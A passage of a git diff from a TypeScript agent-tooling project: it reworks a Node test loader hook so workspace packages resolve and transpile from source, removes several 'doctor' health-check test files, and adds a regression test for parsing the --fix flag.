index 6188d54a4..2d476430e 100644
--- a/src/resources/extensions/gsd/tests/dist-redirect.mjs
+++ b/src/resources/extensions/gsd/tests/dist-redirect.mjs
@@ -7,17 +7,28 @@ const require = createRequire(import.meta.url);
 const ROOT = new URL("../../../../../", import.meta.url);
 
 export function resolve(specifier, context, nextResolve) {
-  // 1. Direct redirects to dist/ for specific packages
+  // 1. Redirect all workspace package bare imports to source.
+  //    CI portability runs don't build any packages/ dist artifacts, so every
+  //    @gsd/* specifier (including transitive ones pulled in by pi-coding-agent
+  //    source itself) must resolve to the TypeScript source entrypoint.
   if (specifier === "../../packages/pi-coding-agent/src/index.js") {
-    specifier = new URL("packages/pi-coding-agent/dist/index.js", ROOT).href;
+    specifier = new URL("packages/pi-coding-agent/src/index.ts", ROOT).href;
+  } else if (specifier === "@gsd/pi-coding-agent") {
+    specifier = new URL("packages/pi-coding-agent/src/index.ts", ROOT).href;
   } else if (specifier === "@gsd/pi-ai/oauth") {
-    specifier = new URL("packages/pi-ai/dist/utils/oauth/index.js", ROOT).href;
+    specifier = new URL("packages/pi-ai/src/utils/oauth/index.ts", ROOT).href;
   } else if (specifier === "@gsd/pi-ai") {
-    specifier = new URL("packages/pi-ai/dist/index.js", ROOT).href;
+    specifier = new URL("packages/pi-ai/src/index.ts", ROOT).href;
   } else if (specifier === "@gsd/pi-agent-core") {
-    specifier = new URL("packages/pi-agent-core/dist/index.js", ROOT).href;
+    specifier = new URL("packages/pi-agent-core/src/index.ts", ROOT).href;
   } else if (specifier === "@gsd/pi-tui") {
-    specifier = new URL("packages/pi-tui/dist/index.js", ROOT).href;
+    specifier = new URL("packages/pi-tui/src/index.ts", ROOT).href;
+  } else if (specifier === "@gsd/native") {
+    specifier = new URL("packages/native/src/index.ts", ROOT).href;
+  } else if (specifier.startsWith("@gsd/native/")) {
+    // Sub-path imports like @gsd/native/fd, @gsd/native/text, etc.
+    const subpath = specifier.slice("@gsd/native/".length);
+    specifier = new URL(`packages/native/src/${subpath}/index.ts`, ROOT).href;
   }
   // 2. Redirect packages/*/dist/ → packages/*/src/ with .js→.ts for strip-types
   //    Also handles local imports — skip rewrite for dist/ paths that are real compiled artifacts.
@@ -54,9 +65,15 @@ export function resolve(specifier, context, nextResolve) {
 }
 
 export function load(url, context, nextLoad) {
-  // Node's --experimental-strip-types handles .ts but not .tsx (which may contain JSX).
-  // Use TypeScript to transpile .tsx → JS with react-jsx transform, then serve as module.
-  if (url.endsWith('.tsx')) {
+  // Node's --experimental-strip-types handles plain .ts but not .tsx and not
+  // all TypeScript syntax used by workspace packages (parameter properties,
+  // decorators, etc.). Transpile all workspace package source files and .tsx
+  // files through TypeScript's transpileModule to avoid those crashes.
+  const shouldTranspileWithTypeScript =
+    url.endsWith('.tsx') ||
+    (url.endsWith('.ts') && url.includes('/packages/') && url.includes('/src/'));
+
+  if (shouldTranspileWithTypeScript) {
     const ts = require('typescript');
     const source = readFileSync(fileURLToPath(url), 'utf-8');
     const { outputText } = ts.transpileModule(source, {
@@ -66,9 +83,30 @@ export function load(url, context, nextLoad) {
         module: ts.ModuleKind.ESNext,
         target: ts.ScriptTarget.ESNext,
         esModuleInterop: true,
+        experimentalDecorators: true,
+        emitDecoratorMetadata: true,
       },
     });
-    return { format: 'module', source: outputText, shortCircuit: true };
+    // Inject CJS-compatible globals (__dirname, __filename, require) so that
+    // workspace packages compiled as ESM can still use them.  This avoids the
+    // need for import.meta.url behind indirect invocation patterns that fail in
+    // CJS and in dynamically-created scopes.
+    // Only inject globals that the source file doesn't already declare itself.
+    const preambleLines = [
+      'import { fileURLToPath as __preamble_fUTP } from "node:url";',
+      'import { dirname as __preamble_dn } from "node:path";',
+      'import { createRequire as __preamble_cR } from "node:module";',
+    ];
+    if (!outputText.includes('const __filename') && !outputText.includes('let __filename')) {
+      preambleLines.push('const __filename = __preamble_fUTP(import.meta.url);');
+    }
+    if (!outputText.includes('const __dirname') && !outputText.includes('let __dirname')) {
+      preambleLines.push('const __dirname = __preamble_dn(__preamble_fUTP(import.meta.url));');
+    }
+    if (!outputText.includes('const require') && !outputText.includes('let require')) {
+      preambleLines.push('const require = __preamble_cR(import.meta.url);');
+    }
+    return { format: 'module', source: preambleLines.join('\n') + '\n' + outputText, shortCircuit: true };
   }
   return nextLoad(url, context);
 }
diff --git a/src/resources/extensions/gsd/tests/doctor-completion-deferral.test.ts b/src/resources/extensions/gsd/tests/doctor-completion-deferral.test.ts
deleted file mode 100644
index 86c723d8c..000000000
--- a/src/resources/extensions/gsd/tests/doctor-completion-deferral.test.ts
+++ /dev/null
@@ -1,148 +0,0 @@
-/**
- * Regression test for #1808: Completion-transition doctor fix deferral
- * creates fragile handoff window.
- *
- * Only slice summary should be deferred (needs LLM content).
- * Roadmap checkbox and UAT stub are mechanical bookkeeping and must be
- * fixed immediately at task fixLevel to prevent inconsistent state if the
- * session stops between last task and complete-slice.
- */
-
-import { mkdirSync, writeFileSync, rmSync, readFileSync, existsSync } from "node:fs";
-import { join } from "node:path";
-import { tmpdir } from "node:os";
-import test from "node:test";
-import assert from "node:assert/strict";
-import { runGSDDoctor } from "../doctor.ts";
-import { COMPLETION_TRANSITION_CODES } from "../doctor-types.ts";
-
-function makeTmp(name: string): string {
-  const dir = join(tmpdir(), `doctor-deferral-${name}-${Date.now()}-${Math.random().toString(36).slice(2)}`);
-  mkdirSync(dir, { recursive: true });
-  return dir;
-}
-
-/**
- * Build a minimal .gsd structure: milestone with one slice, one task
- * marked done with a summary — but no slice summary, no UAT, and
- * roadmap unchecked. This is the state after the last task completes.
- */
-function buildScaffold(base: string) {
-  const gsd = join(base, ".gsd");
-  const m = join(gsd, "milestones", "M001");
-  const s = join(m, "slices", "S01", "tasks");
-  mkdirSync(s, { recursive: true });
-
-  writeFileSync(join(m, "M001-ROADMAP.md"), `# M001: Test
-
-## Slices
-
-- [ ] **S01: Test Slice** \`risk:low\` \`depends:[]\`
-  > Demo text
-`);
-
-  writeFileSync(join(m, "slices", "S01", "S01-PLAN.md"), `# S01: Test Slice
-
-**Goal:** test
-
-## Tasks
-
-- [x] **T01: Do stuff** \`est:5m\`
-`);
-
-  writeFileSync(join(s, "T01-SUMMARY.md"), `---
-id: T01
-parent: S01
-milestone: M001
-duration: 5m
-verification_result: passed
-completed_at: 2026-01-01
----
-
-# T01: Do stuff
-
-Done.
-`);
-}
-
-test("COMPLETION_TRANSITION_CODES only contains slice summary code", () => {
-  assert.ok(
-    COMPLETION_TRANSITION_CODES.has("all_tasks_done_missing_slice_summary"),
-    "summary code should still be deferred"
-  );
-  assert.ok(
-    !COMPLETION_TRANSITION_CODES.has("all_tasks_done_missing_slice_uat"),
-    "UAT code should NOT be deferred"
-  );
-  assert.ok(
-    !COMPLETION_TRANSITION_CODES.has("all_tasks_done_roadmap_not_checked"),
-    "roadmap code should NOT be deferred"
-  );
-});
-
-test("fixLevel:task — fixes UAT stub immediately, defers summary and roadmap checkbox (#1808, #1910)", async () => {
-  const tmp = makeTmp("partial-deferral");
-  try {
-    buildScaffold(tmp);
-
-    const report = await runGSDDoctor(tmp, { fix: true, fixLevel: "task" });
-
-    // Should detect all three issues
-    const codes = report.issues.map(i => i.code);
-    assert.ok(codes.includes("all_tasks_done_missing_slice_summary"), "should detect missing summary");
-    assert.ok(codes.includes("all_tasks_done_missing_slice_uat"), "should detect missing UAT");
-    assert.ok(codes.includes("all_tasks_done_roadmap_not_checked"), "should detect unchecked roadmap");
-
-    // Summary should NOT be created (still deferred — needs LLM content)
-    const sliceSummaryPath = join(tmp, ".gsd", "milestones", "M001", "slices", "S01", "S01-SUMMARY.md");
-    assert.ok(!existsSync(sliceSummaryPath), "should NOT have created summary stub (deferred)");
-
-    // UAT stub SHOULD be created (mechanical bookkeeping, no longer deferred)
-    const sliceUatPath = join(tmp, ".gsd", "milestones", "M001", "slices", "S01", "S01-UAT.md");
-    assert.ok(existsSync(sliceUatPath), "should have created UAT stub immediately");
-
-    // Roadmap checkbox must NOT be checked without summary on disk (#1910).
-    // Checking it without the summary causes deriveState() to skip complete-slice.
-    const roadmapContent = readFileSync(join(tmp, ".gsd", "milestones", "M001", "M001-ROADMAP.md"), "utf8");
-    assert.ok(roadmapContent.includes("- [ ] **S01"), "roadmap must NOT be checked without summary on disk (#1910)");
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
-  }
-});
-
-test("fixLevel:task — session crash after last task leaves UAT consistent, roadmap deferred with summary (#1808, #1910)", async () => {
-  const tmp = makeTmp("crash-consistency");
-  try {
-    buildScaffold(tmp);
-
-    // Simulate: doctor runs at task level (as auto-mode does after last task)
-    await runGSDDoctor(tmp, { fix: true, fixLevel: "task" });
-
-    // Now simulate a session crash — no complete-slice ever runs.
-    // A new session starts and runs doctor again at task level.
-    const report2 = await runGSDDoctor(tmp, { fix: true, fixLevel: "task" });
-
-    const remainingCodes = report2.issues.map(i => i.code);
-    assert.ok(
-      !remainingCodes.includes("all_tasks_done_missing_slice_uat"),
-      "UAT should already be fixed from first doctor run"
-    );
-    // Summary is still missing (deferred), that is expected
-    assert.ok(
-      remainingCodes.includes("all_tasks_done_missing_slice_summary"),
-      "summary should still be detected as missing (deferred)"
-    );
-    // Roadmap should still be unchecked because summary doesn't exist (#1910)
-    assert.ok(
-      remainingCodes.includes("all_tasks_done_roadmap_not_checked"),
-      "roadmap should still be unchecked — summary does not exist on disk (#1910)"
-    );
-    // Must NOT produce the cascade error from checking roadmap without summary
-    assert.ok(
-      !remainingCodes.includes("slice_checked_missing_summary"),
-      "must not produce slice_checked_missing_summary (#1910)"
-    );
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
-  }
-});
diff --git a/src/resources/extensions/gsd/tests/doctor-environment.test.ts b/src/resources/extensions/gsd/tests/doctor-environment.test.ts
deleted file mode 100644
index cc7f396a7..000000000
--- a/src/resources/extensions/gsd/tests/doctor-environment.test.ts
+++ /dev/null
@@ -1,314 +0,0 @@
-/**
- * doctor-environment.test.ts — Tests for environment health checks (#1221).
- *
- * Tests:
- *   - Node version detection
- *   - Dependencies installed check
- *   - Env file detection
- *   - Port conflict detection
- *   - Disk space check
- *   - Docker detection
- *   - Project tool detection
- *   - Doctor issue conversion
- *   - Report formatting
- */
-
-import { mkdtempSync, mkdirSync, writeFileSync, rmSync } from "node:fs";
-import { join, dirname } from "node:path";
-import { tmpdir } from "node:os";
-
-import {
-  runEnvironmentChecks,
-  runFullEnvironmentChecks,
-  environmentResultsToDoctorIssues,
-  formatEnvironmentReport,
-  checkEnvironmentHealth,
-  type EnvironmentCheckResult,
-} from "../doctor-environment.ts";
-import { createTestContext } from "./test-helpers.ts";
-
-const { assertEq, assertTrue, assertMatch, report } = createTestContext();
-
-function createProjectDir(files: Record<string, string> = {}): string {
-  const dir = mkdtempSync(join(tmpdir(), "gsd-env-test-"));
-  for (const [name, content] of Object.entries(files)) {
-    const filePath = join(dir, name);
-    mkdirSync(dirname(filePath), { recursive: true });
-    writeFileSync(filePath, content);
-  }
-  return dir;
-}
-
-async function main(): Promise<void> {
-  const cleanups: string[] = [];
-
-  try {
-    // ── Node Version Check ─────────────────────────────────────────────
-    console.log("\n=== env: no package.json returns empty ===");
-    {
-      const dir = createProjectDir();
-      cleanups.push(dir);
-      const results = runEnvironmentChecks(dir);
-      // No package.json → no node checks
-      const nodeCheck = results.find(r => r.name === "node_version");
-      assertEq(nodeCheck, undefined, "no node version check without package.json");
-    }
-
-    console.log("\n=== env: package.json without engines returns no node check ===");
-    {
-      const dir = createProjectDir({
-        "package.json": JSON.stringify({ name: "test", version: "1.0.0" }),
-      });
-      cleanups.push(dir);
-      const results = runEnvironmentChecks(dir);
-      const nodeCheck = results.find(r => r.name === "node_version");
-      assertEq(nodeCheck, undefined, "no node version check without engines field");
-    }
-
-    console.log("\n=== env: package.json with engines returns node check ===");
-    {
-      const dir = createProjectDir({
-        "package.json": JSON.stringify({
-          name: "test",
-          version: "1.0.0",
-          engines: { node: ">=18.0.0" },
-        }),
-      });
-      cleanups.push(dir);
-      const results = runEnvironmentChecks(dir);
-      const nodeCheck = results.find(r => r.name === "node_version");
-      assertTrue(nodeCheck !== undefined, "node version check runs with engines field");
-      // Current node should be >= 18 in CI
-      assertEq(nodeCheck!.status, "ok", "node version meets requirement");
-    }
-
-    // ── Dependencies Check ─────────────────────────────────────────────
-    console.log("\n=== env: missing node_modules detected ===");
-    {
-      const dir = createProjectDir({
-        "package.json": JSON.stringify({ name: "test" }),
-      });
-      cleanups.push(dir);
-      const results = runEnvironmentChecks(dir);
-      const depsCheck = results.find(r => r.name === "dependencies");
-      assertTrue(depsCheck !== undefined, "dependencies check runs");
-      assertEq(depsCheck!.status, "error", "missing node_modules is an error");
-      assertTrue(depsCheck!.message.includes("node_modules missing"), "reports missing node_modules");
-    }
-
-    console.log("\n=== env: existing node_modules detected ===");
-    {
-      const dir = createProjectDir({
-        "package.json": JSON.stringify({ name: "test" }),
-      });
-      mkdirSync(join(dir, "node_modules"), { recursive: true });
-      cleanups.push(dir);
-      const results = runEnvironmentChecks(dir);
-      const depsCheck = results.find(r => r.name === "dependencies");
-      assertTrue(depsCheck !== undefined, "dependencies check runs");
-      assertEq(depsCheck!.status, "ok", "existing node_modules is ok");
-    }
-
-    // ── Env File Check ─────────────────────────────────────────────────
-    console.log("\n=== env: .env.example without .env detected ===");
-    {
-      const dir = createProjectDir({
-        ".env.example": "DB_URL=xxx\nAPI_KEY=xxx\n",
-      });
-      cleanups.push(dir);
-      const results = runEnvironmentChecks(dir);
-      const envCheck = results.find(r => r.name === "env_file");
-      assertTrue(envCheck !== undefined, "env file check runs");
-      assertEq(envCheck!.status, "warning", "missing .env is a warning");
-    }
-
-    console.log("\n=== env: .env.example with .env is ok ===");
-    {
-      const dir = createProjectDir({
-        ".env.example": "DB_URL=xxx\n",
-        ".env": "DB_URL=postgres://localhost/test\n",
-      });
-      cleanups.push(dir);
-      const results = runEnvironmentChecks(dir);
-      const envCheck = results.find(r => r.name === "env_file");
-      assertTrue(envCheck !== undefined, "env file check runs");
-      assertEq(envCheck!.status, "ok", "present .env is ok");
-    }
-
-    console.log("\n=== env: .env.example with .env.local is ok ===");
-    {
-      const dir = createProjectDir({
-        ".env.example": "DB_URL=xxx\n",
-        ".env.local": "DB_URL=postgres://localhost/test\n",
-      });
-      cleanups.push(dir);
-      const results = runEnvironmentChecks(dir);
-      const envCheck = results.find(r => r.name === "env_file");
-      assertTrue(envCheck !== undefined, "env file check runs");
-      assertEq(envCheck!.status, "ok", ".env.local counts as present");
-    }
-
-    // ── Disk Space Check ───────────────────────────────────────────────
-    console.log("\n=== env: disk space check returns result ===");
-    if (process.platform !== "win32") {
-      const dir = createProjectDir();
-      cleanups.push(dir);
-      const results = runEnvironmentChecks(dir);
-      const diskCheck = results.find(r => r.name === "disk_space");
-      assertTrue(diskCheck !== undefined, "disk space check runs on unix");
-      // Should be ok on dev machines with reasonable disk
-      assertTrue(diskCheck!.status === "ok" || diskCheck!.status === "warning", "disk check returns valid status");
-    }
-
-    // ── Project Tools Check ────────────────────────────────────────────
-    console.log("\n=== env: detects missing python when pyproject.toml exists ===");
-    {
-      const dir = createProjectDir({
-        "package.json": JSON.stringify({ name: "test" }),
-        "pyproject.toml": "[build-system]\nrequires = ['setuptools']\n",
-      });
-      mkdirSync(join(dir, "node_modules"), { recursive: true });
-      cleanups.push(dir);
-      const results = runEnvironmentChecks(dir);
-      const pythonCheck = results.find(r => r.name === "python");
-      // Python is likely installed on CI/dev machines, so just verify the check runs
-      // without error — the result depends on the system
-      assertTrue(true, "python check runs without error");
-    }
-
-    console.log("\n=== env: detects Cargo.toml ===");
-    {
-      const dir = createProjectDir({
-        "package.json": JSON.stringify({ name: "test" }),
-        "Cargo.toml": "[package]\nname = 'test'\n",
-      });
-      mkdirSync(join(dir, "node_modules"), { recursive: true });
-      cleanups.push(dir);
-      const results = runEnvironmentChecks(dir);
-      // Just verify it runs without error
-      assertTrue(true, "cargo check runs without error");
-    }
-
-    // ── Docker Check ───────────────────────────────────────────────────
-    console.log("\n=== env: no docker check without Dockerfile ===");
-    {
-      const dir = createProjectDir({
-        "package.json": JSON.stringify({ name: "test" }),
-      });
-      mkdirSync(join(dir, "node_modules"), { recursive: true });
-      cleanups.push(dir);
-      const results = runEnvironmentChecks(dir);
-      const dockerCheck = results.find(r => r.name === "docker");
-      assertEq(dockerCheck, undefined, "no docker check without Dockerfile");
-    }
-
-    console.log("\n=== env: docker check with Dockerfile ===");
-    {
-      const dir = createProjectDir({
-        "package.json": JSON.stringify({ name: "test" }),
-        "Dockerfile": "FROM node:22\n",
-      });
-      mkdirSync(join(dir, "node_modules"), { recursive: true });
-      cleanups.push(dir);
-      const results = runEnvironmentChecks(dir);
-      const dockerCheck = results.find(r => r.name === "docker");
-      // Docker may or may not be installed on the test machine
-      assertTrue(dockerCheck !== undefined, "docker check runs when Dockerfile present");
-    }
-
-    // ── Doctor Issue Conversion ────────────────────────────────────────
-    console.log("\n=== env: converts results to doctor issues ===");
-    {
-      const results: EnvironmentCheckResult[] = [
-        { name: "node_version", status: "ok", message: "Node.js v22.0.0" },
-        { name: "dependencies", status: "error", message: "node_modules missing" },
-        { name: "env_file", status: "warning", message: ".env missing", detail: "Copy .env.example" },
-      ];
-
-      const issues = environmentResultsToDoctorIssues(results);
-      assertEq(issues.length, 2, "only non-ok results converted");
-      assertEq(issues[0]!.severity, "error", "error severity preserved");
-      assertEq(issues[0]!.code, "env_dependencies", "code prefixed with env_");
-      assertEq(issues[1]!.severity, "warning", "warning severity preserved");
-      assertTrue(issues[1]!.message.includes("Copy .env.example"), "detail included in message");
-    }
-
-    // ── checkEnvironmentHealth integration ──────────────────────────────
-    console.log("\n=== env: checkEnvironmentHealth adds issues to array ===");
-    {
-      const dir = createProjectDir({
-        "package.json": JSON.stringify({ name: "test" }),
-      });
-      cleanups.push(dir);
-
-      const issues: any[] = [];
-      await checkEnvironmentHealth(dir, issues);
-      // Should have at least the missing node_modules issue
-      assertTrue(issues.some(i => i.code === "env_dependencies"), "environment issues added to array");
-    }
-
-    // ── Report Formatting ──────────────────────────────────────────────
-    console.log("\n=== env: formatEnvironmentReport ===");
-    {
-      const results: EnvironmentCheckResult[] = [
-        { name: "node_version", status: "ok", message: "Node.js v22.0.0" },
-        { name: "dependencies", status: "error", message: "node_modules missing", detail: "Run npm install" },
-        { name: "disk_space", status: "ok", message: "50.2GB free" },
-      ];
-
-      const report = formatEnvironmentReport(results);
-      assertTrue(report.includes("Environment Health:"), "has header");
-      assertTrue(report.includes("Node.js v22.0.0"), "includes ok result");
-      assertTrue(report.includes("node_modules missing"), "includes error result");
-      assertTrue(report.includes("Run npm install"), "includes detail for errors");
-    }
-
-    console.log("\n=== env: formatEnvironmentReport empty ===");
-    {
-      const report = formatEnvironmentReport([]);
-      assertEq(report, "No environment checks applicable.", "empty report message");
-    }
-
-    // ── Full environment checks include git remote ─────────────────────
-    console.log("\n=== env: runFullEnvironmentChecks includes git remote ===");
-    {
-      // runFullEnvironmentChecks adds git remote check
-      // We can't easily test this without a real git repo, but verify it doesn't throw
-      const dir = createProjectDir();
-      cleanups.push(dir);
-      const results = runFullEnvironmentChecks(dir);
-      // No git repo → no remote check, but should not throw
-      assertTrue(true, "runFullEnvironmentChecks does not throw on non-git dir");
-    }
-
-    // ── Port Detection from package.json ───────────────────────────────
-    console.log("\n=== env: port detection from scripts ===");
-    if (process.platform !== "win32") {
-      const dir = createProjectDir({
-        "package.json": JSON.stringify({
-          name: "test",
-          scripts: {
-            dev: "next dev --port 3456",
-            start: "node server.js",
-          },
-        }),
-      });
-      mkdirSync(join(dir, "node_modules"), { recursive: true });
-      cleanups.push(dir);
-      const results = runEnvironmentChecks(dir);
-      // Port 3456 is unlikely to be in use, so no conflicts expected
-      const portConflicts = results.filter(r => r.name === "port_conflict");
-      // Just verify it ran without error
-      assertTrue(true, "port check with script-detected ports runs without error");
-    }
-
-  } finally {
-    for (const dir of cleanups) {
-      try { rmSync(dir, { recursive: true, force: true }); } catch { /* ignore */ }
-    }
-  }
-
-  report();
-}
-
-main();
diff --git a/src/resources/extensions/gsd/tests/doctor-fix-flag.test.ts b/src/resources/extensions/gsd/tests/doctor-fix-flag.test.ts
new file mode 100644
index 000000000..f2919ca4e
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/doctor-fix-flag.test.ts
@@ -0,0 +1,92 @@
+/**
+ * Regression test for #1919: --fix flag not stripped before positional parse.
+ *
+ * parseDoctorArgs("--fix") must:
+ *   1. Set fixFlag = true
+ *   2. Not leak "--fix" into requestedScope
+ *   3. Keep mode as "doctor" (the flag is not a positional subcommand)
+ */
+
+import { parseDoctorArgs } from "../commands-handlers.js";
+import { createTestContext } from "./test-helpers.ts";
+
+const { assertEq, assertTrue, report } = createTestContext();
+
+async function main(): Promise<void> {
+  // ── 1. Bare --fix flag ──────────────────────────────────────────────────────
+  console.log("\n=== bare --fix flag (#1919) ===");
+  {
+    const r = parseDoctorArgs("--fix");
+    assertTrue(r.fixFlag, "--fix sets fixFlag to true");
+    assertEq(r.mode, "doctor", "--fix does not change mode from doctor");
+    assertEq(r.requestedScope, undefined, "--fix is stripped and does not become requestedScope");
+  }
+
+  // ── 2. --fix with a scope ──────────────────────────────────────────────────
+  console.log("\n=== --fix with scope ===");
+  {
+    const r = parseDoctorArgs("--fix M001/S01");
+    assertTrue(r.fixFlag, "--fix M001/S01 sets fixFlag to true");
+    assertEq(r.mode, "doctor", "--fix M001/S01 keeps mode as doctor");
+    assertEq(r.requestedScope, "M001/S01", "scope is M001/S01 after stripping --fix");
+  }
+
+  // ── 3. Positional fix still works ──────────────────────────────────────────
+  console.log("\n=== positional fix subcommand ===");
+  {
+    const r = parseDoctorArgs("fix");
+    assertEq(r.fixFlag, false, "positional fix does not set fixFlag");
+    assertEq(r.mode, "fix", "positional fix sets mode to fix");
+    assertEq(r.requestedScope, undefined, "no scope with bare positional fix");
+  }
+
+  // ── 4. Positional fix with scope ───────────────────────────────────────────
+  console.log("\n=== positional fix with scope ===");
+  {
+    const r = parseDoctorArgs("fix M001");
+    assertEq(r.mode, "fix", "fix M001 sets mode to fix");
+    assertEq(r.requestedScope, "M001", "fix M001 parses scope as M001");
+  }
+
+  // ── 5. --fix combined with other flags ─────────────────────────────────────
+  console.log("\n=== --fix combined with --dry-run ===");
+  {
+    const r = parseDoctorArgs("--fix --dry-run");
+    assertTrue(r.fixFlag, "--fix --dry-run sets fixFlag");
+    assertTrue(r.dryRun, "--fix --dry-run sets dryRun");
+    assertEq(r.requestedScope, undefined, "no scope leaked from combined flags");
+  }
+
+  // ── 6. --fix combined with --json ──────────────────────────────────────────
+  console.log("\n=== --fix with --json ===");
+  {
+    const r = parseDoctorArgs("--fix --json");
+    assertTrue(r.fixFlag, "--fix --json sets fixFlag");
+    assertTrue(r.jsonMode, "--fix --json sets jsonMode");
+    assertEq(r.requestedScope, undefined, "no scope leaked from --fix --json");
+  }
+
+  // ── 7. Empty args (baseline) ───────────────────────────────────────────────
+  console.log("\n=== empty args baseline ===");
+  {
+    const r = parseDoctorArgs("");
+    assertEq(r.fixFlag, false, "empty args: fixFlag false");
+    assertEq(r.mode, "doctor", "empty args: mode is doctor");
+    assertEq(r.requestedScope, undefined, "empty args: no scope");
+  }
+
+  // ── 8. heal and audit modes unaffected ─────────────────────────────────────
+  console.log("\n=== heal and audit modes ===");
+  {
+    const rh = parseDoctorArgs("heal M001/S01");
+    assertEq(rh.mode, "heal", "heal mode parsed correctly");
+    assertEq(rh.requestedScope, "M001/S01", "heal scope parsed correctly");
+
+    const ra = parseDoctorArgs("audit");
+    assertEq(ra.mode, "audit", "audit mode parsed correctly");
+  }
+
+  report();
+}
+
+main();
diff --git a/src/resources/extensions/gsd/tests/doctor-fixlevel.test.ts b/src/resources/extensions/gsd/tests/doctor-fixlevel.test.ts
deleted file mode 100644
index 5ee3be354..000000000
--- a/src/resources/extensions/gsd/tests/doctor-fixlevel.test.ts
+++ /dev/null
@@ -1,246 +0,0 @@
-/**
- * Tests that doctor's fixLevel option correctly separates task-level
- * bookkeeping from completion state transitions.
- *
- * fixLevel:"task" — fixes task checkboxes, does NOT create slice summary
- *   stubs, UAT stubs, or mark slices done in the roadmap.
- * fixLevel:"all" (default) — fixes everything including completion transitions.
- */
-
-import { mkdirSync, writeFileSync, rmSync, readFileSync, existsSync } from "node:fs";
-import { join } from "node:path";
-import { tmpdir } from "node:os";
-import test from "node:test";
-import assert from "node:assert/strict";
-import { runGSDDoctor } from "../doctor.ts";
-
-function makeTmp(name: string): string {
-  const dir = join(tmpdir(), `doctor-fixlevel-${name}-${Date.now()}-${Math.random().toString(36).slice(2)}`);
-  mkdirSync(dir, { recursive: true });
-  return dir;
-}
-
-/**
- * Build a minimal .gsd structure: milestone with one slice, one task
- * marked done with a summary — but no slice summary and roadmap unchecked.
- * This is exactly the state after the last task completes.
- */
-function buildScaffold(base: string) {
-  const gsd = join(base, ".gsd");
-  const m = join(gsd, "milestones", "M001");
-  const s = join(m, "slices", "S01", "tasks");
-  mkdirSync(s, { recursive: true });
-
-  writeFileSync(join(m, "M001-ROADMAP.md"), `# M001: Test
-
-## Slices
-
-- [ ] **S01: Test Slice** \`risk:low\` \`depends:[]\`
-  > Demo text
-`);
-
-  writeFileSync(join(m, "slices", "S01", "S01-PLAN.md"), `# S01: Test Slice
-
-**Goal:** test
-
-## Tasks
-
-- [x] **T01: Do stuff** \`est:5m\`
-`);
-
-  writeFileSync(join(s, "T01-SUMMARY.md"), `---
-id: T01
-parent: S01
-milestone: M001
-duration: 5m
-verification_result: passed
-completed_at: 2026-01-01
----
-
-# T01: Do stuff
-
-Done.
-`);
-}
-
-test("fixLevel:task — defers summary stub and roadmap checkbox, fixes UAT immediately (#1808, #1910)", async () => {
-  const tmp = makeTmp("task-level");
-  try {
-    buildScaffold(tmp);
-
-    const report = await runGSDDoctor(tmp, { fix: true, fixLevel: "task" });
-
-    // Should detect the issues
-    const codes = report.issues.map(i => i.code);
-    assert.ok(codes.includes("all_tasks_done_missing_slice_summary"), "should detect missing summary");
-    assert.ok(codes.includes("all_tasks_done_roadmap_not_checked"), "should detect unchecked roadmap");
-
-    // Summary should NOT be created (still deferred — needs LLM content)
-    const sliceSummaryPath = join(tmp, ".gsd", "milestones", "M001", "slices", "S01", "S01-SUMMARY.md");
-    assert.ok(!existsSync(sliceSummaryPath), "should NOT have created summary stub");
-
-    // Roadmap must NOT be checked without summary on disk (#1910)
-    const roadmapContent = readFileSync(join(tmp, ".gsd", "milestones", "M001", "M001-ROADMAP.md"), "utf8");
-    assert.ok(roadmapContent.includes("- [ ] **S01"), "roadmap must NOT be checked without summary (#1910)");
-
-    // Fixes applied should NOT include summary or roadmap
-    for (const f of report.fixesApplied) {
-      assert.ok(!f.includes("SUMMARY"), `should not have fixed summary: ${f}`);
-      assert.ok(!f.includes("ROADMAP") && !f.includes("roadmap"), `should not have fixed roadmap: ${f}`);
-    }
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
-  }
-});
-
-test("fixLevel:all (default) — detects AND fixes completion issues", async () => {
-  const tmp = makeTmp("all-level");
-  try {
-    buildScaffold(tmp);
-
-    const report = await runGSDDoctor(tmp, { fix: true });
-
-    // Should detect the issues
-    const codes = report.issues.map(i => i.code);
-    assert.ok(codes.includes("all_tasks_done_missing_slice_summary"), "should detect missing summary");
-    assert.ok(codes.includes("all_tasks_done_roadmap_not_checked"), "should detect unchecked roadmap");
-
-    // SHOULD have fixed them
-    const sliceSummaryPath = join(tmp, ".gsd", "milestones", "M001", "slices", "S01", "S01-SUMMARY.md");
-    assert.ok(existsSync(sliceSummaryPath), "should have created summary stub");
-
-    const roadmapContent = readFileSync(join(tmp, ".gsd", "milestones", "M001", "M001-ROADMAP.md"), "utf8");
-    assert.ok(roadmapContent.includes("- [x] **S01"), "roadmap should show S01 as checked");
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
-  }
-});
-
-test("fixLevel:all — marks indented roadmap checkboxes done (#1063)", async () => {
-  const tmp = makeTmp("indented-roadmap");
-  try {
-    buildScaffold(tmp);
-
-    // Overwrite roadmap with indented checkbox (LLM formatting drift)
-    writeFileSync(join(tmp, ".gsd", "milestones", "M001", "M001-ROADMAP.md"), `# M001: Test
-
-## Slices
-
-  - [ ] **S01: Test Slice** \`risk:low\` \`depends:[]\`
-    > Demo text
-`);
-
-    const report = await runGSDDoctor(tmp, { fix: true });
-
-    const roadmapContent = readFileSync(join(tmp, ".gsd", "milestones", "M001", "M001-ROADMAP.md"), "utf8");
-    // Should mark [x] while preserving the leading whitespace
-    assert.ok(roadmapContent.includes("  - [x] **S01"), "indented roadmap checkbox should be marked done");
-    // Verify indentation is preserved: line should start with "  -", not just "-"
-    const checkedLine = roadmapContent.split("\n").find(l => l.includes("[x] **S01"));
-    assert.ok(checkedLine?.startsWith("  -"), `should preserve leading whitespace, got: "${checkedLine}"`);
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
-  }
-});
-
-test("fixLevel:all — marks indented task checkboxes done (#1063)", async () => {
-  const tmp = makeTmp("indented-task");
-  try {
-    const gsd = join(tmp, ".gsd");
-    const m = join(gsd, "milestones", "M001");
-    const s = join(m, "slices", "S01", "tasks");
-    mkdirSync(s, { recursive: true });
-
-    writeFileSync(join(m, "M001-ROADMAP.md"), `# M001: Test
-
-## Slices
-
-- [ ] **S01: Test Slice** \`risk:low\` \`depends:[]\`
-`);
-
-    // Plan with indented checkbox
-    writeFileSync(join(m, "slices", "S01", "S01-PLAN.md"), `# S01: Test Slice
-
-**Goal:** test
-
-## Tasks
-
-  - [ ] **T01: Do stuff** \`est:5m\`
-`);
-
